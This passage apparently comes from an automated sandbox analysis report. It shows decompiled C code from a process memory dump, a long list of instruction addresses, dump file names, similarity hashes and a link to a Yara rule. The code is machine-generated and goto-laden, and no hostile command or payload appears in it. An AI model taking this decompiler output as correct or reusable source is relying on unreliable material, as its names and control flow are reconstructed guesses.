																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}

0x1e3af90b
0x1e3af911
0x1e3af917
0x1e3af919
0x1e3af91c
0x1e405d63
0x1e405d69
0x1e405d69
0x1e405d63
0x1e3af922
0x1e3af927
0x1e405d72
0x1e405d78
0x1e405d78
0x1e405d72
0x1e3af92d
0x1e3af931
0x1e3afa2d
0x1e3afa2d
0x1e3af939
0x1e3af940
0x1e3af944
0x1e3afa37
0x1e3afa39
0x1e3afa3c
0x1e3afa3e
0x1e3afa41
0x1e3afa48
0x1e3afe68
0x1e3afe6c
0x1e3afe6c
0x1e3afe78
0x1e3afe78
0x1e3afe7a
0x1e3afe7a
0x1e3afe7e
0x1e3afe6e
0x1e3afe6e
0x1e3afe72
0x00000000
0x00000000
0x00000000
0x1e3afe80
0x1e3afe80
0x1e3afe83
0x00000000
0x1e3afe83
0x1e405d7f
0x1e405d81
0x00000000
0x00000000
0x1e405d87
0x00000000
0x1e405d87
0x1e3afa4e
0x1e3afa50
0x1e405d90
0x00000000
0x00000000
0x1e405d98
0x1e3afa58
0x1e3afa58
0x1e3afa5d
0x1e3afa60
0x1e3afa63
0x1e3afa69
0x1e3afa6b
0x1e3afa6e
0x1e3afa71
0x1e405da1
0x1e405da7
0x1e405da7
0x1e405da1
0x1e3afa79
0x1e3b0071
0x1e3b0073
0x1e3b0074
0x00000000
0x1e3afa7f
0x1e3afa83
0x1e3afa85
0x1e405dae
0x1e405dae
0x1e3afa8b
0x1e3afa8f
0x1e3afa98
0x1e3afaa1
0x1e3afaa4
0x1e3afaa6
0x1e3afaa9
0x1e3afaac
0x1e405db7
0x1e405dbd
0x1e405dbd
0x1e405db7
0x1e3afab4
0x00000000
0x1e3afaba
0x1e3afabc
0x1e3afac2
0x1e3afac5
0x1e3afac7
0x1e3afac7
0x1e3afad6
0x1e3afad9
0x1e3afadf
0x1e3afae2
0x1e3afae4
0x1e3afae7
0x1e3afaea
0x1e3afaed
0x1e405dc4
0x1e405dc9
0x00000000
0x00000000
0x1e405dcf
0x1e3afaf6
0x1e3afafa
0x1e3afafc
0x1e3afafc
0x1e3afafe
0x1e3afb01
0x1e3afb09
0x1e3afb0c
0x1e3afb12
0x1e3afb14
0x1e3afb17
0x1e405dd6
0x1e405dd9
0x1e405dde
0x00000000
0x00000000
0x1e405de4
0x1e405de7
0x1e3afb29
0x1e3afb2c
0x1e405df3
0x1e405df6
0x1e405e06
0x1e405e0c
0x1e405e0f
0x1e405e11
0x00000000
0x1e405e1f
0x00000000
0x1e405e1f
0x1e405e11
0x1e405df8
0x1e405dfb
0x1e405e00
0x00000000
0x00000000
0x1e405e02
0x00000000
0x1e405e02
0x1e3afb32
0x1e3afb35
0x1e3afb3c
0x1e405e26
0x1e405e28
0x1e405e28
0x1e405e2e
0x1e405e3c
0x1e405e3c
0x1e405e2e
0x1e3afb45
0x1e3afb47
0x1e3afb53
0x1e3afb56
0x1e3afb59
0x1e3afb5c
0x1e3afb65
0x1e3b000d
0x00000000
0x1e3b000f
0x1e3b000f
0x00000000
0x1e3b000f
0x1e3afb6b
0x1e3afb6e
0x1e3afb71
0x1e3afb73
0x1e3afb76
0x1e405e45
0x1e405e4b
0x1e405e4b
0x1e405e45
0x1e3afb80
0x1e3afb83
0x1e405e54
0x1e405e5a
0x1e405e5a
0x1e405e54
0x1e3afb89
0x1e3afb98
0x1e3afb9b
0x1e3afb9e
0x1e3afba0
0x1e405e63
0x1e405e69
0x1e405e69
0x1e405e63
0x1e3afba8
0x00000000
0x1e3afbae
0x1e3afbb2
0x1e405e70
0x1e3afbb8
0x1e3afbb8
0x1e3afbb8
0x1e3afbbd
0x1e3afbbf
0x1e3afbbf
0x1e3af9a8
0x1e3af9a8
0x1e3af9ad
0x1e3af9b4
0x1e405eda
0x00000000
0x00000000
0x1e405ee2
0x1e3af9bc
0x1e3af9bc
0x1e3af9bf
0x1e3af9c4
0x1e3afde6
0x1e3afde9
0x1e3afdec
0x1e3afdef
0x1e3afdf2
0x1e405eeb
0x1e405ef1
0x1e405ef1
0x1e405eeb
0x1e3afdfa
0x00000000
0x1e3afe00
0x1e3afe04
0x1e405efa
0x1e405f00
0x1e405f00
0x1e405efa
0x1e3afe0a
0x1e3afa24
0x1e3afa2a
0x1e3afa2a
0x1e3afdfa
0x1e3af9cd
0x00000000
0x1e3af9cf
0x1e3af9cf
0x1e3af9d1
0x1e3af9d4
0x1e3af9d7
0x1e3af9d9
0x1e3af9dc
0x1e3af9df
0x1e3af9e2
0x1e3af9e7
0x1e405f09
0x00000000
0x00000000
0x1e405f11
0x1e3af9ef
0x1e3af9f3
0x1e3afed5
0x1e3afed8
0x1e3afedb
0x1e405f1a
0x1e405f20
0x1e405f20
0x1e405f1a
0x1e3afee3
0x00000000
0x1e3afee9
0x1e3afeeb
0x1e405f29
0x1e405f2f
0x1e405f2f
0x1e405f29
0x1e3afef3
0x00000000
0x1e3afef9
0x1e3afefc
0x1e3aff01
0x1e405f38
0x1e3b0052
0x1e3b0054
0x00000000
0x1e3b0056
0x1e3b0056
0x1e3aff40
0x1e3aff42
0x1e405f6e
0x1e405f74
0x1e405f74
0x1e405f6e
0x1e3aff50
0x1e3aff56
0x1e3aff5b
0x1e405f7d
0x00000000
0x00000000
0x1e405f83
0x00000000
0x1e3aff61
0x1e3aff61
0x1e3aff63
0x1e3b0021
0x1e3b0026
0x1e3b002b
0x1e3b007e
0x1e3b0080
0x1e3b0080
0x1e3b007e
0x1e3b002f
0x00000000
0x1e3b0031
0x1e3b0033
0x1e3b0086
0x1e3b0035
0x1e3b0035
0x1e3b0035
0x1e3b003c
0x00000000
0x1e3b003c
0x1e3b002f
0x1e3aff69
0x1e3aff6b
0x1e405f8c
0x1e405f92
0x1e405f92
0x1e405f8c
0x1e3aff74
0x1e3aff77
0x1e3aff7b
0x1e405f99
0x1e405f9b
0x1e3aff81
0x1e3aff81
0x1e3aff83
0x1e3aff83
0x1e3aff88
0x1e3aff8b
0x1e3aff90
0x1e3aff92
0x1e3aff92
0x1e3aff9c
0x1e3affa2
0x1e3affa6
0x1e3affaa
0x1e3affad
0x1e3affb2
0x1e405fa4
0x1e405faa
0x1e405faa
0x1e405fa4
0x1e3affb8
0x00000000
0x1e3affb8
0x1e3aff5b
0x1e3b0054
0x1e405f3e
0x1e405f3e
0x1e3aff09
0x00000000
0x00000000
0x1e3aff0f
0x1e3aff14
0x1e405f47
0x1e405f4d
0x1e405f4d
0x1e405f47
0x1e3aff1c
0x1e3b0046
0x1e3b0076
0x1e3b0078
0x00000000
0x1e3b0048
0x1e3b0048
0x1e3b004a
0x1e3b004a
0x00000000
0x1e3b004a
0x1e3aff22
0x1e3aff22
0x1e3aff26
0x1e405f56
0x1e405f5c
0x1e405f5c
0x1e405f56
0x1e3aff2e
0x00000000
0x1e3aff34
0x1e3aff36
0x1e405f65
0x1e3aff3c
0x1e3aff3c
0x1e3aff3c
0x1e3aff3e
0x00000000
0x1e3aff3e
0x1e3aff2e
0x1e3aff1c
0x1e3afef3
0x1e3afee3
0x1e3af9f9
0x1e3af9f9
0x1e3af9fb
0x1e3af9ff
0x1e3afbd5
0x1e405fb1
0x1e405fb1
0x1e3afbdf
0x00000000
0x1e3afbe5
0x1e3afbe5
0x1e3afbe8
0x1e3afbed
0x1e405fdf
0x1e3afc01
0x1e3afc01
0x1e3afc04
0x1e3afc09
0x1e405fee
0x1e405ff4
0x1e405ff4
0x1e405fee
0x1e3afc0f
0x1e3afc13
0x1e3afc1d
0x1e3afc20
0x1e3afc23
0x1e3afc26
0x1e3afc2b
0x1e405ffd
0x1e406003
0x1e406003
0x1e405ffd
0x1e3afc33
0x00000000
0x1e3afc39
0x1e3afc3b
0x1e3afc3e
0x1e3afc41
0x1e3afc46
0x1e40600c
0x1e406012
0x1e406012
0x1e40600c
0x1e3afc4e
0x00000000
0x1e3afc54
0x1e3afc54
0x1e3afc59
0x1e40601b
0x1e406021
0x1e406021
0x1e40601b
0x1e3afc61
0x00000000
0x1e3afc67
0x1e3afc6a
0x1e3afc6f
0x1e40602a
0x1e406030
0x1e406030
0x1e40602a
0x1e3afc77
0x00000000
0x1e3afc7d
0x1e3afc7f
0x1e3afc81
0x1e3afc85
0x1e3afc87
0x1e3afc87
0x1e3afc8c
0x1e3afc8f
0x1e3afc94
0x1e406039
0x1e3afc9c
0x1e3afca4
0x1e3afcaa
0x1e3afcaf
0x1e406046
0x1e3afcbd
0x1e3afcbf
0x1e40606d
0x1e406073
0x1e406073
0x1e40606d
0x1e3afcc8
0x1e3afccd
0x1e3afccf
0x1e3afcd3
0x1e3afcd5
0x1e3afcd5
0x1e3afcde
0x1e3afce1
0x1e3afce3
0x1e3afce3
0x1e3afce8
0x1e3afcf0
0x1e3afcf2
0x1e3afcf5
0x1e3afcf7
0x1e3afcff
0x1e3afd02
0x1e3afd06
0x1e3afd11
0x1e3afd14
0x1e3afd17
0x1e40607c
0x1e406082
0x1e406082
0x1e40607c
0x1e3afd1f
0x00000000
0x1e3afd25
0x1e3afd28
0x1e3afd2d
0x1e40608b
0x1e406091
0x1e406091
0x1e40608b
0x1e3afd35
0x00000000
0x1e3afd3b
0x1e3afd3e
0x1e3afd43
0x1e40609a
0x1e3b0016
0x1e3b0018
0x00000000
0x1e3b001a
0x1e3b001a
0x1e3afd82
0x1e3afd84
0x1e4060d9
0x1e4060df
0x1e4060df
0x1e4060d9
0x1e3afd8d
0x1e3afd95
0x1e3afd98
0x1e3afd9d
0x1e4060e8
0x00000000
0x00000000
0x1e4060ee
0x00000000
0x1e3afda3
0x1e3afda3
0x1e3afda5
0x1e3afe8b
0x1e3afe90
0x1e3afe95
0x1e4060f7
0x1e4060fd
0x1e4060fd
0x1e4060f7
0x1e3afe9d
0x00000000
0x1e3afea3
0x1e3afea5
0x1e406106
0x1e3afeab
0x1e3afeab
0x1e3afeab
0x1e3afeb2
0x1e3afeb5
0x00000000
0x1e3afeb5
0x1e3afe9d
0x1e3afdab
0x1e3afdad
0x1e40610f
0x1e406115
0x1e406115
0x1e40610f
0x1e3afdb6
0x1e3afdbb
0x1e40611e
0x1e406120
0x1e3afdc1
0x1e3afdc1
0x1e3afdc5
0x1e3afdc5
0x1e3afdc7
0x1e3afdcc
0x1e3afdce
0x1e3afdce
0x1e3afdd6
0x1e3afdd8
0x00000000
0x1e3afdd8
0x1e3afd9d
0x1e3b0018
0x1e4060a0
0x1e4060a0
0x1e3afd4b
0x00000000
0x00000000
0x1e3afd51
0x1e3afd56
0x1e4060a9
0x1e4060af
0x1e4060af
0x1e4060a9
0x1e3afd5e
0x1e3afebf
0x1e4060b8
0x1e3afec5
0x1e3afec5
0x1e3afec5
0x1e3afec7
0x00000000
0x1e3afd64
0x1e3afd64
0x1e3afd68
0x1e4060c1
0x1e4060c7
0x1e4060c7
0x1e4060c1
0x1e3afd70
0x00000000
0x1e3afd76
0x1e3afd78
0x1e4060d0
0x1e3afd7e
0x1e3afd7e
0x1e3afd7e
0x1e3afd80
0x00000000
0x1e3afd80
0x1e3afd70
0x1e3afd5e
0x1e3afd35
0x1e3afd1f
0x1e40604c
0x1e40604c
0x1e3afcb7
0x1e3affc0
0x1e3affc3
0x1e3affc6
0x1e3affcb
0x1e406055
0x1e40605b
0x1e40605b
0x1e406055
0x1e3affd3
0x00000000
0x1e3affd9
0x1e3affdb
0x1e406064
0x1e3affe1
0x1e3affe1
0x1e3affe1
0x1e3affe3
0x1e3affe7
0x1e3affed
0x00000000
0x1e3affed
0x1e3affd3
0x00000000
0x1e3afcb7
0x1e40603f
0x1e3afc9a
0x00000000
0x1e3afc9a
0x1e3afc77
0x1e3afc61
0x1e3afc4e
0x1e3afc33
0x1e405fe5
0x1e405fe5
0x1e3afbf5
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3afbf5
0x1e3afbdf
0x1e3afa05
0x1e3afa05
0x1e3afa0a
0x1e3afe14
0x1e405fb8
0x1e405fb8
0x1e3afe1e
0x00000000
0x1e3afe24
0x00000000
0x1e3afe24
0x1e3afe1e
0x1e3afa10
0x1e3afa10
0x1e3afa15
0x1e3afe29
0x1e3afe2d
0x1e3afe35
0x1e3afe38
0x1e3afe3b
0x1e405fc1
0x00000000
0x00000000
0x1e405fc7
0x1e3afe43
0x1e3afe45
0x00000000
0x00000000
0x1e3afe4b
0x1e3afe50
0x1e405fd0
0x1e405fd6
0x1e405fd6
0x1e405fd0
0x1e3afe5d
0x1e3afe60
0x00000000
0x1e3afe60
0x1e3afe41
0x1e3afe41
0x00000000
0x1e3afa1b
0x1e3afa1b
0x1e3afa1d
0x1e3afa20
0x00000000
0x1e3afa20
0x1e3afa15
0x1e3af9ed
0x1e3af9ed
0x00000000
0x1e3af9ed
0x1e3af9cd
0x1e3af9ba
0x1e3af9ba
0x00000000
0x1e3af9ba
0x1e3afba8
0x1e3afb65
0x1e3afb1d
0x1e3afb23
0x1e3afb26
0x00000000
0x1e3afb26
0x1e3afaf3
0x1e3afaf3
0x00000000
0x1e3afaf3
0x1e3afab4
0x1e3afa79
0x1e3afa56
0x1e3afa56
0x00000000
0x1e3afa56
0x1e3af94d
0x1e3af950
0x1e3af955
0x1e405e79
0x1e405e7f
0x1e405e7f
0x1e405e79
0x1e3af95b
0x1e3af960
0x1e405e88
0x1e405e8a
0x1e405e8a
0x1e405e8e
0x1e405e93
0x00000000
0x1e405e99
0x1e405e9c
0x1e405e9f
0x1e405ea1
0x1e405ea3
0x1e405ea3
0x1e405ea7
0x00000000
0x1e405ea7
0x1e3af966
0x1e3af966
0x1e3af96b
0x1e405eb0
0x1e405eb6
0x1e405eb6
0x1e405eb0
0x1e3af973
0x1e3afbc7
0x1e3af9a5
0x1e3af9a5
0x00000000
0x1e3af979
0x1e3af97d
0x1e3af97f
0x1e405ebf
0x1e405ec5
0x1e405ec5
0x1e405ebf
0x1e3af987
0x00000000
0x1e3af98d
0x1e3af98d
0x1e3af990
0x1e3af994
0x1e3af997
0x1e3af99f
0x1e3afff7
0x1e3b0061
0x1e3b0064
0x1e3b006a
0x1e405ece
0x1e405ed0
0x1e405ed0
0x00000000
0x1e3b0064
0x1e3afffd
0x1e3b0000
0x00000000
0x1e3b0006
0x1e405ecc
0x00000000
0x1e405ecc
0x1e3b0000
0x00000000
0x1e3af99f
0x1e3af987
0x1e3af973

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction ID: 8b77b0b3f4dffe1095aa4dcea0b2e9cf76e7309d44d1d1d9d5345bbc224d576f
Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction Fuzzy Hash: 3F62B331E146929BCB22CE25C45029AFBA7EF85354F2983A9CD94DB389D375D9C1CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 1E475BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E1E475BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1e481178);
				E1E3FD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E1E474C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E1E3ED000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E1E475542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x1e4960e8;
								if( *0x1e4960e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x1e4960e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E1E3E9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E1E3E6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E1E3EF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E1E3EF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
